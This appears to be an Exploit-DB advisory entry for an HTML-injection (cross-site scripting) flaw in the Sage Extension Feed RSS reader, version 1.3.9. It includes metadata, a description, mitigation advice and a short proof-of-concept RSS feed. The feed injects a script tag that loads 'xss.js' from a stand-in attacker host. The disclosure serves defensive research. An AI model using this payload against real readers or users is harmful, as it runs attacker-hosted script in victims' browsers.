Sage Extension Feed HTML-injection vulnerability

vendor:

Sage Extension Feed

by:

Unknown

5.5

CVSS

MEDIUM

HTML-injection

CWE

Product Name: Sage Extension Feed

Affected Version From: 1.3.2009

Affected Version To: 1.3.2009

Patch Exists: NO

Related CWE:

CPE: a:sage_extension_feed:1.3.9

Metasploit:

Other Scripts:

Platforms Tested:

2007

Sage Extension Feed HTML-injection vulnerability

The Sage Extension Feed application fails to properly sanitize user-supplied input before using it in dynamically generated content, leading to an HTML-injection vulnerability. Hostile HTML and script code can be injected into vulnerable sections of the application, which can be rendered in the browser of a user viewing a malicious RSS feed.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input before using it in dynamically generated content. Additionally, users should be cautious when viewing RSS feeds from untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22493/info

Sage Extension Feed is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Hostile HTML and script code may be injected into vulnerable sections of the application. When viewed, this code may be rendered in the browser of a user viewing a malicious RSS feed.

Sage Extension Feed 1.3.9 is vulnerable to this issue; prior versions may also be affected. 

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"


<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<SCRIPT/=''SRC='http://atackersite/xss.js'></SCRIPT>
]]>
</content:encoded>
</item>
</channel>
</rss>